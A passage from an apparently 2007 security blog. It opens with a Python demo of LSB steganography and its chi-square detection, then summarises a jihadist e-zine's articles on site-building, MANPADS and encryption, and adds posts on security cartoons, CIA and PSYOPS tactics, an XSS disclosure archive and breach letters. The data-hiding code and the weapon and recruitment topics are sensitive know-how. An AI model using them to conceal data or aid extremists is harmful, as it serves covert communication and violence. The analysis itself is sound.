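        out[idx] = (out[idx] & 0xFE) | bit   # pixel value changes by at most 1
    return out

def extract_lsb(pixels, nbytes):
    """Read nbytes back from the LSBs, inverse of embed_lsb."""
    out = bytearray()
    for i in range(nbytes):
        byte = 0
        for p in pixels[i * 8:(i + 1) * 8]:
            byte = (byte << 1) | (p & 1)
        out.append(byte)
    return bytes(out)

def histogram(pixels):
    h = [0] * 256
    for p in pixels:
        h[p] += 1
    return h

def pov_chi_square(pixels):
    """Pairs-of-values statistic (Westfeld/Pfitzmann style): LSB embedding of a
    random payload drives each bin pair (2k, 2k+1) toward equal counts, so the
    chi-square distance from 'equal pairs' drops sharply on a stego image."""
    h = histogram(pixels)
    chi = 0.0
    for k in range(128):
        expected = (h[2 * k] + h[2 * k + 1]) / 2
        if expected > 0:
            chi += (h[2 * k] - expected) ** 2 / expected
    return chi

def demo(seed=7, width=200, height=200):
    rng = random.Random(seed)
    # Constructed cover: a dark, noisy frame whose histogram falls off steeply,
    # so adjacent even/odd bins are naturally unequal (as in real photos).
    cover = [min(255, int(rng.expovariate(1 / 4.0))) for _ in range(width * height)]
    # Constructed payload that looks like ciphertext, filling every pixel's LSB.
    payload = bytes(rng.getrandbits(8) for _ in range(len(cover) // 8))
    stego = embed_lsb(cover, payload)
    return {
        "max_pixel_change": max(abs(a - b) for a, b in zip(cover, stego)),
        "cover_chi": pov_chi_square(cover),
        "stego_chi": pov_chi_square(stego),
    }

if __name__ == "__main__":
    print(demo())
```

The visual cost is a change of at most one grey level per pixel, which is why the e-zine can show near-identical images; the histogram pairs, not the eye, give the embedding away.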

02. Article Two - Creating a Jihadist's Site for Newbies

In order for jihadists to generate more noise and build a loyal army of believers, the authors have taken the time and effort to explain the basics of web design, web hosting, and various other issues related to building a jihadist site from scratch. In times of "war on ideologies", the bigger the community, the higher the chance of possible recruitment.

03. Article Three - An Overview of Short Range Shoulder-Fired Missiles

From IT security to conventional weaponry articles, the shift is a very interesting one, especially the in-depth knowledge of various systems and the countermeasures aircraft have against MANPADS. What's worth mentioning is the PSYOPS motif of a jihadist's sandal on top of scrap from an obviously downed helicopter. The article concludes with detailed technical specifications of MANPADS and by highlighting the dominance of the Russian IGLA system.

Key terms from article three:

Infrared (wavelength greater than 0.7 micron); Ultraviolet (UV: wavelength less than 0.4 micron); Infrared seeker head; IFF (Identification Friend or Foe) antenna; Digital signal processing (DSP); Counter-Countermeasures (CCM); Directed infrared countermeasures (DIRCM); Sensor - Mercury Cadmium Telluride (HgCdTe) 1-24mm; Sensor - Indium Antimonide (InSb) 1-5.5mm

04. Article Four - Basics and Importance of Encryption
Ever wondered how Alice and Bob exchange keys in Arabic? This article explains in detail the basics and importance of encryption, and compared to issue one of the Technical Mujahid, which was recommending PGP, the author is now recommending the Mujahideen Secrets encryption tool.

05. Article Five - Basics of Video Recording and Subtitling Clips
Wonder how the whole jihadist multimedia revolution started? As it seems, there's a team of "reporters" attached to militant groups to record the battles and later on add propaganda background music and subtitles to achieve an even more influential effect on their audience.

Dear wannabe jihadists - if your definition of existence consists of a futile attempt to achieve a knowledge-driven jihadist community by generating noise with armies of religiously brainwashed soldiers, you face extinction, it's that simple.

Wednesday, June 06, 2007

Security Cartoons

Although the main goal of the initiative is to build better awareness among average Internet users through security cartoons, it's also very entertaining for someone working professionally in the field. The original press release:

"The cartoons we have developed obviously are not a textbook approach, not made for professional journals or geared to an audience of professional researchers," said Srikwan, who is the graphic designer of www.SecurityCartoon.com. "We wanted this to be accessible to anyone who uses the Internet -- general consumers, teenagers, teachers and anybody who banks or shops online. That's why the cartoon format is perfect -- everybody can relate to it. The cartoons cover online security issues such as phishing, pharming, malware, spoofing and password protection. But as opposed to most other educational efforts relating to these topics, the cartoons do not only teach their readers what to do and not to do, but why, too."

Is building security awareness in the age of malicious economies of scale worth the investment of outsourcing the program details to an experienced vendor? You bet, and what I especially like about the cartoon collection is its vendor-independent position: it's not promoting product-concept myopia, the product as the solution to the threat, but vigilance and maintaining decent situational awareness while online. The rest is up to a vendor's marketing and sales department, hopefully trying to win more customers by proving their solution outperforms the rest of the vendors, as opposed to a profit-margin-centered vendor trying to squeeze the juice out of a commoditized product or solution that lacks any major differentiation points.

Here are two more great collections of security cartoons.

CIA's "Upcoming" Black Ops Against Iran

Recent articles pointing out U.S. President Bush's clearance for CIA black operations against Iran make it sound like something the CIA hasn't been doing for decades already. Here's an example of a real-life spy thriller, on how the CIA helped U.S. embassy workers escape the country unharmed during Iran's revolution by using a fake sci-fi movie production as an excuse:

"He was stuck. For about a week, no one in Washington or Ottawa could invent a reason for anyone to be in Tehran. Then Mendez hit upon an unusual but strangely credible plan: He'd become Kevin Costa Harkins, an Irish film producer leading his preproduction crew through Iran to do some location scouting for a big-budget Hollywood epic. Mendez had contacts in Hollywood from past collaborations. (After all, they were in the same business of creating false realities.) And it wouldn't be surprising, Mendez thought, that a handful of eccentrics from Tinseltown might be oblivious to the political situation in revolutionary Iran. The Iranian government, incredibly, was trying to encourage international business in the country. They needed the hard currency, and a film production could mean millions of US dollars."

Today's active black ops doctrine isn't happening without Iran taking notice, of course:

"Other Iranian Americans also have been prohibited from leaving Iran in recent months, including Parnaz Azima, a journalist for the U.S.-funded Radio Farda; Ali Shakeri, a founding board member of the Center for Citizen Peacebuilding at the University of California, Irvine; and Kian Tajbakhsh, a consultant working for George Soros' Open Society Institute."

Realizing the U.S.'s inability to wage conventional war on yet another front -- from a PR point of view, not a lack of capacity -- the CIA is logically putting more effort into undermining a religious regime where it hurts most: Iran's overall isolation from the world's economic markets, and a fact with which no one in the international community feels comfortable, namely Iran's continuing efforts to supply the enemies -- Hezbollah -- of its enemies -- the U.S. -- with technology and know-how that was supposedly hard to acquire.

Capitalism has the power to undermine any regime, except perhaps one whose foundations are purely religious, as with Islam; therefore dirty tricks like fabricating evidence and making the average Iranian perceive the current rulers as corrupt puppets behind a power-driven vision seem to be a way of destabilizing the regime. Another recent example of an unnamed intelligence agency's PSYOPS team aiming to achieve a distorted media echo by distributing false rumors, relying on the basis that there's truth in every rumour, was that of the Muammar Gaddafi coma speculation that quickly spread around the world. But what was the purpose of this hoax? Let's clarify - to achieve a media echo effect by abusing the mainstream media's major weakness, always trying to be the first to spread a groundbreaking event. What did the colonel do once he found out he was in a coma? Instead of ignoring it, he fell victim to an even more well-thought-out trap, and responded that he'll sue the news agency that came up with the hoax, thus achieving an even more successful media echo effect. If you want to destroy a regime, you destroy it from the inside out, not the other way around, and perhaps the key objective of this PSYOPS was to help the regime's citizens envision a future without their leader, even for a few hours, before the fact is once again on the front pages. Ingenious intelligence thinking.

PSYOPS and BLACKOPS intersect, and these are among the many practical examples I pointed out in a previous post:

- your web sites spread messages of your enemies
- sms messages and your voice mail say you're about to lose the war
- your fancy military email account is inaccessible due to info-warriors utilizing the power of the masses, thus script kiddies to distract the attention
- you gain participation, thus support
- you feel like Johnny Mnemonic taking the elevator to pick up the 320 GB of R&D data when a guerilla info-warrior appears on the screen and wakes you up on your current stage of brainwashing
- starting from the basics that the only way to ruin a socialist type of government is to introduce its citizens to the joys of capitalism -- it always works
- hacktivism - traffic acquisition plus undermining confidence
- propaganda - North Korea is quite experienced
- self-serving news items, commissioned ones
- achieving Internet echo as a primary objective
- introducing biased exclusiveness
- stating primary objectives as facts that have already happened
- impersonation

Monday, June 04, 2007

g0t XSSed?

Following previous posts on XSSing The Planet and XSS Vulnerabilities in E-banking Sites, here's a full disclosure project that's basically categorizing user-submitted XSS vulnerabilities by pagerank/government/public entity, with mirrored XSSed pages.

Even a .secured TLD name is nothing more than a false feeling of security, with phishers still loading content from e-banking providers' sites and actively exploiting XSS vulnerabilities to make their scams use the bank's own site. Therefore, from a business development perspective, you ought to realize that overperforming in a developing market segment is sometimes more profitable than being a pioneer with an idea the market's not willing to anticipate for the time being -- perhaps for the best.

Data Breach Sample Letters of Notification

Dear customer, to ensure your satisfaction with our quality services, we're notifying you that our inability to protect your sensitive data has resulted in its leakage on the World Wide Web, so stay tuned for possible identity theft and for spending the next couple of years explaining how it wasn't you who bought that luxurious yacht your bank wants you to pay for. By the time our stolen laptops get connected to the Internet -- which we doubt anyway -- they will phone back, helping us locate them, which doesn't mean we didn't breach the confidentiality of your personal information; we are just trying to be socially responsible at the time of notification.

Sincerely,
Your favorite and customer-friendly breached retailer

Perhaps the most comprehensive archive of scanned data breach notification letters from U.S.-based companies I've come across so far. Well worth going through in case you wonder what tone a breached company uses to maintain its weakened brand image and to prevent a PR disaster.

Related posts:
To report, or not to report?
Personal Data Security Breaches - 2000/2005
A Chart of Personal Data Security Breaches 2005-2006
Getting paid for getting hacked